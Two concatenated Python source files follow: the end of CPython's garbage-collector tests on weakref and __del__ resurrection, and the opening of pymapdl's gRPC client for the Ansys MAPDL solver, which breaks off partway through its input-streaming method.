def tearDown(self):
gc.disable()
def test_bug1055820c(self):
# Corresponds to temp2c.py in the bug report. This is pretty
# elaborate.
c0 = C1055820(0)
# Move c0 into generation 2.
gc.collect()
c1 = C1055820(1)
c1.keep_c0_alive = c0
del c0.loop # now only c1 keeps c0 alive
c2 = C1055820(2)
c2wr = weakref.ref(c2) # no callback!
ouch = []
def callback(ignored):
ouch[:] = [c2wr()]
# The callback gets associated with a wr on an object in generation 2.
c0wr = weakref.ref(c0, callback)
c0 = c1 = c2 = None
# What we've set up: c0, c1, and c2 are all trash now. c0 is in
# generation 2. The only thing keeping it alive is that c1 points to
# it. c1 and c2 are in generation 0, and are in self-loops. There's a
# global weakref to c2 (c2wr), but that weakref has no callback.
# There's also a global weakref to c0 (c0wr), and that does have a
# callback, and that callback references c2 via c2wr().
#
# c0 has a wr with callback, which references c2wr
# ^
# |
# | Generation 2 above dots
#. . . . . . . .|. . . . . . . . . . . . . . . . . . . . . . . .
# | Generation 0 below dots
# |
# |
# ^->c1 ^->c2 has a wr but no callback
# | | | |
# <--v <--v
#
# So this is the nightmare: when generation 0 gets collected, we see
# that c2 has a callback-free weakref, and c1 doesn't even have a
# weakref. Collecting generation 0 doesn't see c0 at all, and c0 is
# the only object that has a weakref with a callback. gc clears c1
# and c2. Clearing c1 has the side effect of dropping the refcount on
# c0 to 0, so c0 goes away (despite that it's in an older generation)
# and c0's wr callback triggers. That in turn materializes a reference
# to c2 via c2wr(), but c2 gets cleared anyway by gc.
# We want to let gc happen "naturally", to preserve the distinction
# between generations.
junk = []
i = 0
detector = GC_Detector()
while not detector.gc_happened:
i += 1
if i > 10000:
self.fail("gc didn't happen after 10000 iterations")
self.assertEqual(len(ouch), 0)
junk.append([]) # this will eventually trigger gc
self.assertEqual(len(ouch), 1) # else the callback wasn't invoked
for x in ouch:
# If the callback resurrected c2, the instance would be damaged,
# with an empty __dict__.
self.assertEqual(x, None)
def test_bug1055820d(self):
# Corresponds to temp2d.py in the bug report. This is very much like
# test_bug1055820c, but uses a __del__ method instead of a weakref
# callback to sneak in a resurrection of cyclic trash.
ouch = []
class D(C1055820):
def __del__(self):
ouch[:] = [c2wr()]
d0 = D(0)
# Move all the above into generation 2.
gc.collect()
c1 = C1055820(1)
c1.keep_d0_alive = d0
del d0.loop # now only c1 keeps d0 alive
c2 = C1055820(2)
c2wr = weakref.ref(c2) # no callback!
d0 = c1 = c2 = None
# What we've set up: d0, c1, and c2 are all trash now. d0 is in
# generation 2. The only thing keeping it alive is that c1 points to
# it. c1 and c2 are in generation 0, and are in self-loops. There's
# a global weakref to c2 (c2wr), but that weakref has no callback.
# There are no other weakrefs.
#
# d0 has a __del__ method that references c2wr
# ^
# |
# | Generation 2 above dots
#. . . . . . . .|. . . . . . . . . . . . . . . . . . . . . . . .
# | Generation 0 below dots
# |
# |
# ^->c1 ^->c2 has a wr but no callback
# | | | |
# <--v <--v
#
# So this is the nightmare: when generation 0 gets collected, we see
# that c2 has a callback-free weakref, and c1 doesn't even have a
# weakref. Collecting generation 0 doesn't see d0 at all. gc clears
# c1 and c2. Clearing c1 has the side effect of dropping the refcount
# on d0 to 0, so d0 goes away (despite that it's in an older
# generation) and d0's __del__ triggers. That in turn materializes
# a reference to c2 via c2wr(), but c2 gets cleared anyway by gc.
# We want to let gc happen "naturally", to preserve the distinction
# between generations.
detector = GC_Detector()
junk = []
i = 0
while not detector.gc_happened:
i += 1
if i > 10000:
self.fail("gc didn't happen after 10000 iterations")
self.assertEqual(len(ouch), 0)
junk.append([]) # this will eventually trigger gc
self.assertEqual(len(ouch), 1) # else __del__ wasn't invoked
for x in ouch:
# If __del__ resurrected c2, the instance would be damaged, with an
# empty __dict__.
self.assertEqual(x, None)
class PythonFinalizationTests(unittest.TestCase):
def test_ast_fini(self):
# bpo-44184: Regression test for subtype_dealloc() when deallocating
# an AST instance also destroy its AST type: subtype_dealloc() must
# not access the type memory after deallocating the instance, since
# the type memory can be freed as well. The test is also related to
# _PyAST_Fini() which clears references to AST types.
code = textwrap.dedent("""
import ast
import codecs
# Small AST tree to keep their AST types alive
tree = ast.parse("def f(x, y): return 2*x-y")
x = [tree]
x.append(x)
# Put the cycle somewhere to survive until the last GC collection.
# Codec search functions are only cleared at the end of
# interpreter_clear().
def search_func(encoding):
return None
search_func.a = x
codecs.register(search_func)
""")
assert_python_ok("-c", code)
def setUpModule():
global enabled, debug
enabled = gc.isenabled()
gc.disable()
assert not gc.isenabled()
debug = gc.get_debug()
gc.set_debug(debug & ~gc.DEBUG_LEAK) # this test is supposed to leak
gc.collect() # Delete 2nd generation garbage
def tearDownModule():
gc.set_debug(debug)
# test gc.enable() even if GC is disabled by default
if verbose:
print("restoring automatic collection")
# make sure to always test gc.enable()
gc.enable()
assert gc.isenabled()
if not enabled:
gc.disable()
if __name__ == "__main__":
unittest.main()
|
mapdl_grpc.py
|
"""gRPC specific class and methods for the MAPDL gRPC client """
import fnmatch
from functools import wraps
import glob
import io
import os
import re
import shutil
import subprocess
import tempfile
import threading
import time
from warnings import warn
import weakref
import grpc
from grpc._channel import _InactiveRpcError, _MultiThreadedRendezvous
import numpy as np
from tqdm import tqdm
MSG_IMPORT = """There was a problem importing the ANSYS MAPDL API module `ansys-api-mapdl`.
Please make sure you have the latest updated version using:
'pip install ansys-api-mapdl' or 'pip install --upgrade ansys-api-mapdl'
If this does not solve it, please reinstall 'ansys.mapdl.core'
or contact Technical Support at 'https://github.com/pyansys/pymapdl'."""
MSG_MODULE = """ANSYS API module `ansys.api.mapdl` could not be found.
This might be due to a faulty installation or obsolete API module version.
Please make sure you have the latest updated version using:
'pip install ansys-api-mapdl' or 'pip install --upgrade ansys-api-mapdl'
If this does not solve it, please reinstall 'ansys.mapdl.core'.
or contact Technical Support at 'https://github.com/pyansys/pymapdl'."""
try:
from ansys.api.mapdl.v0 import ansys_kernel_pb2 as anskernel
from ansys.api.mapdl.v0 import mapdl_pb2 as pb_types
from ansys.api.mapdl.v0 import mapdl_pb2_grpc as mapdl_grpc
except ImportError: # pragma: no cover
raise ImportError(MSG_IMPORT)
except ModuleNotFoundError: # pragma: no cover
raise ImportError(MSG_MODULE)
from ansys.mapdl.core import _LOCAL_PORTS, __version__, check_version
from ansys.mapdl.core.common_grpc import (
ANSYS_VALUE_TYPE,
DEFAULT_CHUNKSIZE,
DEFAULT_FILE_CHUNK_SIZE,
parse_chunks,
)
from ansys.mapdl.core.errors import MapdlExitedError, MapdlRuntimeError, protect_grpc
from ansys.mapdl.core.mapdl import _MapdlCore
from ansys.mapdl.core.misc import (
check_valid_ip,
last_created,
random_string,
run_as_prep7,
supress_logging,
)
from ansys.mapdl.core.post import PostProcessing
TMP_VAR = "__tmpvar__"
VOID_REQUEST = anskernel.EmptyRequest()
# Default 256 MB message length
MAX_MESSAGE_LENGTH = int(os.environ.get("PYMAPDL_MAX_MESSAGE_LENGTH", 256 * 1024**2))
def chunk_raw(raw, save_as):
with io.BytesIO(raw) as f:
while True:
piece = f.read(DEFAULT_FILE_CHUNK_SIZE)
length = len(piece)
if length == 0:
return
yield pb_types.UploadFileRequest(
file_name=os.path.basename(save_as),
chunk=anskernel.Chunk(payload=piece, size=length),
)
def get_file_chunks(filename, progress_bar=False):
"""Serializes a file into chunks"""
pbar = None
if progress_bar:
n_bytes = os.path.getsize(filename)
base_name = os.path.basename(filename)
pbar = tqdm(
total=n_bytes,
desc="Uploading %s" % base_name,
unit="B",
unit_scale=True,
unit_divisor=1024,
)
with open(filename, "rb") as f:
while True:
piece = f.read(DEFAULT_FILE_CHUNK_SIZE)
length = len(piece)
if length == 0:
if pbar is not None:
pbar.close()
return
if pbar is not None:
pbar.update(length)
chunk = anskernel.Chunk(payload=piece, size=length)
yield pb_types.UploadFileRequest(
file_name=os.path.basename(filename), chunk=chunk
)
def save_chunks_to_file(
chunks, filename, progress_bar=True, file_size=None, target_name=""
):
"""Saves chunks to a local file
Returns
-------
file_size : int
File size saved in bytes. ``0`` means no file was written.
"""
pbar = None
if progress_bar:
pbar = tqdm(
total=file_size,
desc="Downloading %s" % target_name,
unit="B",
unit_scale=True,
unit_divisor=1024,
)
file_size = 0
with open(filename, "wb") as f:
for chunk in chunks:
f.write(chunk.payload)
payload_size = len(chunk.payload)
file_size += payload_size
if pbar is not None:
pbar.update(payload_size)
if pbar is not None:
pbar.close()
return file_size
class RepeatingTimer(threading.Timer):
"""Run a function repeately"""
def run(self):
while not self.finished.is_set():
self.function(*self.args, **self.kwargs)
self.finished.wait(self.interval)
class MapdlGrpc(_MapdlCore):
"""This class connects to a GRPC MAPDL server and allows commands
to be passed to a persistent session.
Parameters
----------
ip : str, optional
IP address to connect to the server. Defaults to 'localhost'.
port : int, optional
Port to connect to the mapdl server. Defaults to 50052.
timeout : float
Maximum allowable time to connect to the MAPDL server.
loglevel : str, optional
Sets which messages are printed to the console. Default
'INFO' prints out all ANSYS messages, 'WARNING` prints only
messages containing ANSYS warnings, and 'ERROR' prints only
error messages.
cleanup_on_exit : bool, optional
Exit MAPDL when Python exits or when this instance is garbage
collected.
set_no_abort : bool, optional
Sets MAPDL to not abort at the first error within /BATCH mode.
Default ``True``.
remove_temp_files : bool, optional
Removes temporary files on exit if MAPDL is local. Default
``False``.
log_file : bool, optional
Copy the log to a file called `logs.log` located where the
python script is executed. Default ``True``.
print_com : bool, optional
Print the command ``/COM`` arguments to the standard output.
Default ``False``.
Examples
--------
Connect to an instance of MAPDL already running on locally on the
default port 50052.
>>> from ansys.mapdl import core as pymapdl
>>> mapdl = pymapdl.Mapdl()
Connect to an instance of MAPDL running on the LAN on a default port.
>>> mapdl = pymapdl.Mapdl('192.168.1.101')
Connect to an instance of MAPDL running on the LAN on a non-default port.
>>> mapdl = pymapdl.Mapdl('192.168.1.101', port=60001)
If you wish to customize the channel, you can also directly connect
directly to gRPC channels. For example, if you wanted to create an insecure
channel with a maximum message length of 8 MB.
>>> import grpc
>>> channel = grpc.insecure_channel(
... '127.0.0.1:50052',
... options=[
... ("grpc.max_receive_message_length", 8*1024**2),
... ],
... )
>>> mapdl = pymapdl.Mapdl(channel=channel)
"""
# Required by `_name` method to be defined before __init__ be
_ip = None
_port = None
def __init__(
self,
ip=None,
port=None,
timeout=15,
loglevel="WARNING",
log_file=False,
cleanup_on_exit=False,
log_apdl=None,
set_no_abort=True,
remove_temp_files=False,
print_com=False,
channel=None,
**kwargs,
):
"""Initialize connection to the mapdl server"""
self.__distributed = None
if channel is not None:
if ip is not None or port is not None:
raise ValueError(
"If `channel` is specified, neither `port` nor `ip` can be specified."
)
elif ip is None:
ip = "127.0.0.1"
# port and ip are needed to setup the log
self._port = port
self._ip = ip
super().__init__(
loglevel=loglevel,
log_apdl=log_apdl,
log_file=log_file,
print_com=print_com,
**kwargs,
)
# gRPC request specific locks as these gRPC request are not thread safe
self._vget_lock = False
self._get_lock = False
self._prioritize_thermal = False
self._locked = False # being used within MapdlPool
self._stub = None
self._cleanup = cleanup_on_exit
self._remove_tmp = remove_temp_files
self._jobname = kwargs.pop("jobname", "file")
self._path = kwargs.pop("run_location", None)
self._busy = False # used to check if running a command on the server
self._local = ip in ["127.0.0.1", "127.0.1.1", "localhost"]
if "local" in kwargs: # pragma: no cover # allow this to be overridden
self._local = kwargs["local"]
self._health_response_queue = None
self._exiting = False
self._exited = None
self._mute = False
self._db = None
if port is None:
from ansys.mapdl.core.launcher import MAPDL_DEFAULT_PORT
port = MAPDL_DEFAULT_PORT
self._state = None
self._stub = None
self._timeout = timeout
self._pids = []
if channel is None:
self._channel = self._create_channel(ip, port)
else:
self._channel = channel
# connect and validate to the channel
self._multi_connect()
# double check we have access to the local path if not
# explicitly specified
if "local" not in kwargs:
self._verify_local()
# only cache process IDs if launched locally
if self._local and "exec_file" in kwargs:
self._cache_pids()
def _create_channel(self, ip, port):
"""Create an insecured grpc channel."""
check_valid_ip(ip)
# open the channel
channel_str = f"{ip}:{port}"
self._log.debug("Opening insecure channel at %s", channel_str)
return grpc.insecure_channel(
channel_str,
options=[
("grpc.max_receive_message_length", MAX_MESSAGE_LENGTH),
],
)
def _multi_connect(self, n_attempts=5, timeout=15, set_no_abort=True):
"""Try to connect over a series of attempts to the channel.
Parameters
----------
n_attempts : int, optional
Number of connection attempts.
timeout : float, optional
Total timeout.
set_no_abort : bool, optional
Sets MAPDL to not abort at the first error within /BATCH mode.
Default ``True``.
"""
# This prevents a single failed connection from blocking other attempts
connected = False
attempt_timeout = timeout / n_attempts
max_time = time.time() + timeout
i = 0
while time.time() < max_time and i <= n_attempts:
self._log.debug("Connection attempt %d", i + 1)
connected = self._connect(
timeout=attempt_timeout, set_no_abort=set_no_abort
)
i += 1
if connected:
self._log.debug("Connected")
break
else:
self._log.debug(
"Reached either maximum amount of connection attempts (%d) or timeout (%f s).",
n_attempts,
timeout,
)
if not connected:
raise IOError(
f"Unable to connect to MAPDL gRPC instance at {self._channel_str}"
)
@property
def _channel_str(self):
"""Return the target string.
Generally of the form of "ip:port", like "127.0.0.1:50052".
"""
if self._channel is not None:
return self._channel._channel.target().decode()
return ""
def _verify_local(self):
"""Check if Python is local to the MAPDL instance."""
# Verify if python has assess to the MAPDL directory.
if self._local:
if self._path is None:
directory = self.directory
else:
directory = self._path
if self._jobname is None:
jobname = self.jobname
else:
jobname = self._jobname
lockfile = os.path.join(directory, jobname + ".err")
lockfile0 = os.path.join(directory, jobname + "0.err")
if os.path.isfile(lockfile):
return
if os.path.isfile(lockfile0):
return
self._local = False
@property
def mute(self):
"""Silence the response from all MAPDL functions unless
explicitly set to ``True``.
Returns
-------
bool
Current state of the mute.
Examples
--------
>>> mapdl.mute = True
>>> mapdl.prep7()
''
Temporarily override the instance setting this with
``mute=False``. This is useful for methods that parse the
MAPDL output like ``k``.
>>> mapdl.k('', 1, 1, 1, mute=False)
1
"""
return self._mute
@mute.setter
def mute(self, value):
self._mute = value
def __repr__(self):
info = super().__repr__()
return info
def _connect(self, timeout=5, set_no_abort=True, enable_health_check=False):
"""Establish a gRPC channel to a remote or local MAPDL instance.
Parameters
----------
timeout : float
Time in seconds to wait until the connection has been established
"""
self._state = grpc.channel_ready_future(self._channel)
self._stub = mapdl_grpc.MapdlServiceStub(self._channel)
# verify connection
tstart = time.time()
while ((time.time() - tstart) < timeout) and not self._state._matured:
time.sleep(0.01)
if not self._state._matured: # pragma: no cover
return False
self._log.debug("Established connection to MAPDL gRPC")
# keeps mapdl session alive
self._timer = None
if not self._local:
self._initialised = threading.Event()
self._t_trigger = time.time()
self._t_delay = 30
self._timer = threading.Thread(
target=MapdlGrpc._threaded_heartbeat, args=(weakref.proxy(self),)
)
self._timer.daemon = True
self._timer.start()
# initialize mesh, post processing, and file explorer interfaces
from ansys.mapdl.core.mesh_grpc import MeshGrpc
from ansys.mapdl.core.xpl import ansXpl
self._mesh_rep = MeshGrpc(self)
self._post = PostProcessing(self)
self._xpl = ansXpl(self)
# enable health check
if enable_health_check:
self._enable_health_check()
self.__server_version = None
# HOUSEKEEPING:
# Set to not abort after encountering errors. Otherwise, many
# failures in a row will cause MAPDL to exit without returning
# anything useful. Also avoids abort in batch mode if set.
if set_no_abort:
self._set_no_abort()
return True
@property
def _server_version(self):
"""Return the server version.
Examples
--------
>>> mapdl._server_version
(0, 3, 0)
Uses cached ``__server_version`` to avoid unnecessary communication.
"""
# check cache
if self.__server_version is None:
self.__server_version = self._get_server_version()
return self.__server_version
def _get_server_version(self):
"""Request version from gRPC server.
Generally tied to the release version unless on a development release.
2020R2 --> 0.0.0 (or any unknown version)
2021R1 --> 0.3.0
2021R2 --> 0.4.0
2022R1 --> 0.X.X
"""
sver = (0, 0, 0)
verstr = self._ctrl("VERSION")
if verstr:
sver = check_version.version_tuple(verstr)
return sver
def _enable_health_check(self):
"""Places the status of the health check in _health_response_queue"""
# lazy imports here to speed up module load
from grpc_health.v1 import health_pb2, health_pb2_grpc
def _consume_responses(response_iterator, response_queue):
try:
for response in response_iterator:
response_queue.put(response)
# NOTE: we're doing absolutely nothing with this as
# this point since the server side health check
# doesn't change state.
except Exception as err:
if self._exiting:
return
self._exited = True
raise MapdlExitedError("Lost connection with MAPDL server") from None
# enable health check
from queue import Queue
request = health_pb2.HealthCheckRequest()
self._health_stub = health_pb2_grpc.HealthStub(self._channel)
rendezvous = self._health_stub.Watch(request)
# health check feature implemented after 2020R2
try:
status = rendezvous.next()
except Exception as err:
if err.code().name != "UNIMPLEMENTED":
raise err
return
if status.status != health_pb2.HealthCheckResponse.SERVING:
raise MapdlRuntimeError(
"Unable to enable health check and/or connect to" " the MAPDL server"
)
self._health_response_queue = Queue()
# allow main process to exit by setting daemon to true
thread = threading.Thread(
target=_consume_responses,
args=(rendezvous, self._health_response_queue),
daemon=True,
)
thread.start()
def _launch(self, start_parm, timeout=10):
"""Launch a local session of MAPDL in gRPC mode.
This should only need to be used for legacy ``open_gui``
"""
if not self._local:
raise RuntimeError(
"Can only launch the GUI with a local instance of " "MAPDL"
)
from ansys.mapdl.core.launcher import launch_grpc
self._exited = False # reset exit state
port, directory = launch_grpc(**start_parm)
self._connect(port)
# may need to wait for viable connection in open_gui case
tmax = time.time() + timeout
success = False
while time.time() < tmax:
try:
self.prep7()
success = True
break
except:
pass
if not success:
raise RuntimeError("Unable to reconnect to MAPDL")
@property
def post_processing(self):
"""Post-process in an active MAPDL session.
Examples
--------
Get the nodal displacement in the X direction for the first
result set.
>>> mapdl.set(1, 1)
>>> disp_x = mapdl.post_processing.nodal_displacement('X')
array([1.07512979e-04, 8.59137773e-05, 5.70690047e-05, ...,
5.70333124e-05, 8.58600402e-05, 1.07445726e-04])
"""
return self._post
@supress_logging
def _set_no_abort(self):
"""Do not abort MAPDL"""
self.nerr(abort=-1, mute=True)
def _reset_cache(self):
"""Reset cached items"""
self._mesh_rep._reset_cache()
self._geometry._reset_cache()
@property
def _mesh(self):
return self._mesh_rep
def _run(self, cmd, verbose=False, mute=None):
"""Sens a command and return the response as a string.
Parameters
----------
cmd : str
Valid MAPDL command.
verbose : bool, optional
Print the response of a command while it is being run.
mute : bool, optional
Request that no output be sent from the gRPC server.
Defaults to the global setting as specified with
``mapdl.mute = <bool>``. Default ``False``
Examples
--------
Run a basic command.
>>> mapdl.run('/PREP7')
Run a command and suppress its output.
>>> mapdl.run('/PREP7', mute=True)
Run a command and stream its output while it is being run.
>>> mapdl.run('/PREP7', verbose=True)
"""
if mute is None:
mute = self._mute
if self._exited:
raise MapdlExitedError
# don't allow empty commands
if not cmd.strip():
raise ValueError("Empty commands not allowed")
if len(cmd) > 639: # CMD_MAX_LENGTH
raise ValueError("Maximum command length must be less than 640 characters")
self._busy = True
if verbose:
response = self._send_command_stream(cmd, True)
else:
response = self._send_command(cmd, mute=mute)
self._busy = False
return response.strip()
@property
def busy(self):
"""True when MAPDL gRPC server is executing a command"""
return self._busy
@protect_grpc
def _send_command(self, cmd, mute=False):
"""Send a MAPDL command and return the response as a string"""
opt = ""
if mute:
opt = "MUTE" # suppress any output
request = pb_types.CmdRequest(command=cmd, opt=opt)
# TODO: Capture keyboard exception and place this in a thread
grpc_response = self._stub.SendCommand(request)
resp = grpc_response.response
if resp is not None:
return resp.strip()
return None
@protect_grpc
def _send_command_stream(self, cmd, verbose=False):
"""Send a command and expect a streaming response"""
request = pb_types.CmdRequest(command=cmd)
metadata = [("time_step_stream", "100")]
stream = self._stub.SendCommandS(request, metadata=metadata)
response = []
for item in stream:
cmdout = "\n".join(item.cmdout)
if verbose:
print(cmdout)
response.append(cmdout.strip())
return "".join(response)
def _threaded_heartbeat(self):
"""To be called from a thread to verify mapdl instance is alive"""
self._initialised.set()
while True:
if self._exited:
break
try:
time.sleep(self._t_delay)
if not self.is_alive:
break
except ReferenceError:
break
except Exception:
continue
def exit(self, save=False, force=False): # pragma: no cover
"""Exit MAPDL.
Parameters
----------
save : bool, optional
Save the database on exit. Default ``False``.
force : bool, optional
Override any environment variables that may inhibit exiting MAPDL.
Notes
-----
If ``PYMAPDL_START_INSTANCE`` is set to ``False`` (generally set in
remote testing or documentation build), then this will be
ignored. Override this behavior with ``force=True`` to always force
exiting MAPDL regardless of your local environment.
Examples
--------
>>> mapdl.exit()
"""
# check if permitted to start (and hence exit) instances
if not force:
# lazy import here to avoid circular import
from ansys.mapdl.core.launcher import get_start_instance
# ignore this method if PYMAPDL_START_INSTANCE=False
if not get_start_instance():
self._log.info("Ignoring exit due to PYMAPDL_START_INSTANCE=False")
return
if self._exited:
return
self._exiting = True
self._log.debug("Exiting MAPDL")
if save:
try:
self.save()
except:
pass
self._kill() # sets self._exited = True
self._close_process()
self._remove_lock_file()
if self._remove_tmp and self._local:
self._log.debug("Removing local temporary files")
shutil.rmtree(self.directory, ignore_errors=True)
if self._local and self._port in _LOCAL_PORTS:
_LOCAL_PORTS.remove(self._port)
def _kill(self):
"""Call exit(0) on the server."""
self._ctrl("EXIT")
self._exited = True
def _close_process(self):
"""Close all MAPDL processes"""
if self._local:
for pid in self._pids:
try:
os.kill(pid, 9)
except OSError:
pass
def _cache_pids(self):
"""Store the process IDs used when launching MAPDL"""
for filename in self.list_files():
if "cleanup" in filename:
script = os.path.join(self.directory, filename)
with open(script) as f:
raw = f.read()
if os.name == "nt":
pids = re.findall(r"/pid (\d+)", raw)
else:
pids = set(re.findall(r"-9 (\d+)", raw))
self._pids = [int(pid) for pid in pids]
def _remove_lock_file(self):
"""Removes the lock file.
Necessary to call this as a segfault of MAPDL or sys(0) will
not remove the lock file.
"""
mapdl_path = self.directory
if mapdl_path:
for lockname in [self.jobname + ".lock", "file.lock"]:
lock_file = os.path.join(mapdl_path, lockname)
if os.path.isfile(lock_file):
try:
os.remove(lock_file)
except OSError:
pass
def _run_cleanup_script(self): # pragma: no cover
"""Run the APDL cleanup script.
On distributed runs MAPDL creates a cleanup script to kill the
processes created by the ANSYS spawner. Normally this file is
removed when APDL exits normally, but on a failure, it's
necessary to manually close these PIDs.
"""
# run cleanup script when local
if self._local:
for filename in self.list_files():
if "cleanup" in filename:
script = os.path.join(self.directory, filename)
if not os.path.isfile(script):
return
if os.name != "nt":
script = ["/bin/bash", script]
process = subprocess.Popen(
script,
shell=False,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
)
# always communicate to allow process to run
output, err = process.communicate()
self._log.debug(
"Cleanup output:\n\n%s\n%s", output.decode(), err.decode()
)
def list_files(self, refresh_cache=True):
"""List the files in the working directory of MAPDL.
Parameters
----------
refresh_cache : bool, optional
If local, refresh local cache by querying MAPDL for its
current path.
Returns
-------
list
List of files in the working directory of MAPDL.
Examples
--------
>>> files = mapdl.list_files()
>>> for file in files: print(file)
file.lock
file0.bat
file0.err
file0.log
file0.page
file1.err
file1.log
file1.out
file1.page
"""
if self._local: # simply return a python list of files
if refresh_cache:
local_path = self.directory
else:
local_path = self._directory
if local_path:
if os.path.isdir(local_path):
return os.listdir(local_path)
return []
elif self._exited:
raise RuntimeError("Cannot list remote files since MAPDL has exited")
# this will sometimes return 'LINUX x6', 'LIN', or 'L'
if "L" in self.parameters.platform[:1]:
cmd = "ls"
else:
cmd = "dir /b /a"
files = self.sys(cmd).splitlines()
if not files:
warn("No files listed")
return files
@supress_logging
def sys(self, cmd):
"""Pass a command string to the operating system.
APDL Command: /SYS
Passes a command string to the operating system for execution
(see the Operations Guide). Typical strings are system
commands such as list, copy, rename, etc. Control returns to
the ANSYS program after the system procedure is completed.
ANSYS may not be aware of your specific user environment. For
example, on Linux this command may not recognize aliases,
depending on the hardware platform and user environment.
Parameters
----------
cmd : str
Command string, up to 639 characters (including blanks,
commas, etc.). The specified string is passed verbatim to
the operating system, i.e., no parameter substitution is
performed.
Returns
-------
str
Output from the command.
Examples
--------
>>> mapdl.sys('ls')
"""
# always redirect system output to a temporary file
tmp_file = "__tmp_sys_out__"
super().sys(f"{cmd} > {tmp_file}")
if self._local: # no need to download when local
with open(os.path.join(self.directory, tmp_file)) as fobj:
return fobj.read()
return self._download_as_raw(tmp_file).decode()
def download_result(self, path, progress_bar=False, preference=None):
"""Download remote result files to a local directory
Examples
--------
Download remote result files into the current working directory
>>> import os
>>> mapdl.download_result(os.getcwd())
"""
def _download(targets):
for target in targets:
save_name = os.path.join(path, target)
self._download(target, save_name, progress_bar=progress_bar)
if preference:
if preference not in ["rst", "rth"]:
raise ValueError("``preference`` must be either 'rst' or 'rth'")
# result file basename is the jobname
jobname = self.jobname
rth_basename = "%s.%s" % (jobname, "rth")
rst_basename = "%s.%s" % (jobname, "rst")
remote_files = self.list_files()
result_file = None
if self._prioritize_thermal and rth_basename in remote_files:
result_file = rth_basename
elif rst_basename in remote_files and rth_basename in remote_files:
if preference == "rth":
result_file = rth_basename
else:
result_file = rst_basename
elif rst_basename in remote_files:
result_file = rst_basename
elif rth_basename in remote_files:
result_file = rth_basename
if result_file: # found non-distributed result
save_name = os.path.join(path, result_file)
self._download(result_file, save_name, progress_bar=progress_bar)
return save_name
# otherwise, download all the distributed result files
if jobname[-1].isnumeric():
jobname += "_"
rst_files = []
rth_files = []
for filename in remote_files:
if "rst" in filename and jobname in filename:
rst_files.append(filename)
elif "rth" in filename and jobname in filename:
rth_files.append(filename)
if self._prioritize_thermal and rth_files:
targets = rth_files
else:
if rst_files and rth_files:
if preference is None:
raise ValueError(
"Found both structural and thermal results files."
"\nPlease specify which kind to download using:\n"
'``preference="rth"`` or ``preference="rst"``'
)
if preference == "rst":
targets = rst_files
elif preference == "rth":
targets = rth_files
elif rst_files:
preference = "rst"
targets = rst_files
elif rth_files:
preference = "rth"
targets = rth_files
else:
remote_files_str = "\n".join("\t%s" % item for item in remote_files)
print("\t".join("\n%s" % item for item in ["a", "b", "c"]))
raise FileNotFoundError(
"Unable to locate any result file from the "
"following remote result files:\n\n" + remote_files_str
)
_download(targets)
return os.path.join(path, jobname + "0." + preference)
@protect_grpc
def _ctrl(self, cmd):
"""Issue control command to the mapdl server
Available commands:
- 'EXIT'
Calls exit(0) on the server.
- 'set_verb'
Enables verbose mode on the server.
- 'VERSION'
Returns version string in of the server in the form
"MAJOR.MINOR.PATCH". E.g. "0.3.0". Known versions
include:
2020R2 - "0.3.0"
2021R1 - "0.3.0"
2021R2 - "0.4.0"
Unavailable/Flaky:
- 'time_stats'
Prints a table for time stats on the server.
This command appears to be disabled/broken.
- 'mem-stats'
To be added
"""
self._log.debug('Issuing CtrlRequest "%s"', cmd)
request = anskernel.CtrlRequest(ctrl=cmd)
# handle socket closing upon exit
if cmd.lower() == "exit":
try:
# this always returns an error as the connection is closed
self._stub.Ctrl(request)
except (_InactiveRpcError, _MultiThreadedRendezvous):
pass
return
resp = self._stub.Ctrl(request)
if hasattr(resp, "response"):
return resp.response
@wraps(_MapdlCore.cdread)
def cdread(self, option="", fname="", ext="", fnamei="", exti="", **kwargs):
"""Wraps CDREAD"""
option = option.strip().upper()
if option not in ["DB", "SOLID", "COMB"]:
raise ValueError(
f'Option "{option}" is not supported. Please '
"Input the geometry and mesh files separately "
r'with "\INPUT" or ``mapdl.input``'
)
if option == "ALL":
raise ValueError(
f'Option "{option}" is not supported in gRPC mode. Please '
"Input the geometry and mesh files separately "
r'with "\INPUT" or ``mapdl.input``'
)
# the old behaviour is to supplied the name and the extension separatelly.
# to make it easier let's going to allow names with extensions
basename = os.path.basename(fname)
if len(basename.split(".")) == 1:
# there is no extension in the main name.
if ext:
# if extension is an input as an option (old APDL style)
fname = fname + "." + ext
else:
# Using default .db
fname = fname + "." + "cdb"
kwargs.setdefault("verbose", False)
kwargs.setdefault("progress_bar", False)
kwargs.setdefault("orig_cmd", "CDREAD")
kwargs.setdefault("cd_read_option", option.upper())
self.input(fname, **kwargs)
@wraps(_MapdlCore.tbft)
def tbft(
self,
oper="",
id_="",
option1="",
option2="",
option3="",
option4="",
option5="",
option6="",
option7="",
**kwargs,
):
"""Wraps ``_MapdlCore.tbft``."""
if oper.lower() == "eadd":
# Option 2 is a file and option 4 is the directory.
# Option 3 is be extension
option3 = option3.replace(".", "")
fname = option2 if not option3 else option2 + "." + option3
filename = os.path.join(option4, fname)
if self._local:
if not os.path.exists(filename) and filename not in self.list_files():
raise FileNotFoundError(f"File '{filename}' could not be found.")
else:
if os.path.exists(filename):
self.upload(filename)
option4 = "" # You don't need the directory if you upload it.
elif filename in self.list_files():
option4 = "" # You don't need the directory if the file is in WDIR
pass
else:
raise FileNotFoundError(f"File '{filename}' could not be found.")
return super().tbft(
oper,
id_,
option1,
option2,
option3,
option4,
option5,
option6,
option7,
**kwargs,
)
@protect_grpc
def input(
self,
fname,
verbose=False,
progress_bar=False,
time_step_stream=None,
chunk_size=512,
orig_cmd="/INP",
**kwargs,
):
"""Stream a local input file to a remote mapdl instance.
Stream the response back and deserialize the output.
Parameters
----------
fname : str
MAPDL input file to stream to the MAPDL grpc server.
time_step_stream : int
Time to wait between streaming updates to send back chunks
from the listener file. Larger values mean more data per
chunk and less chunks, but if the command is short, will
wait until time_step_stream is finished leading to a long
execution time.
Due to stability issues, the default time_step_stream is
dependent on verbosity. The defaults are:
- ``verbose=True``: ``time_step_stream=500``
- ``verbose=False``: ``time_step_stream=50``
These defaults will be ignored if ``time_step_stream`` is
manually set.
orig_cmd : str
Original command. There are some cases, were input is
used to send the file to the grpc server but then we want
to run something different than ``/INPUT``, for example
``CDREAD``.
Returns
-------
str
Response from MAPDL.
Examples
--------
Load a simple ``"ds.dat"`` input file generated from Ansys
Workbench.
>>> output = mapdl.input('ds.dat')
Load that same file while streaming the output in real-time.
>>> output = mapdl.input('ds.dat', verbose=True)
"""
# always check if file is present as the grpc and MAPDL errors
# are unclear
filename = self._get_file_path(fname, progress_bar)
if time_step_stream is not None:
if time_step_stream <= 0:
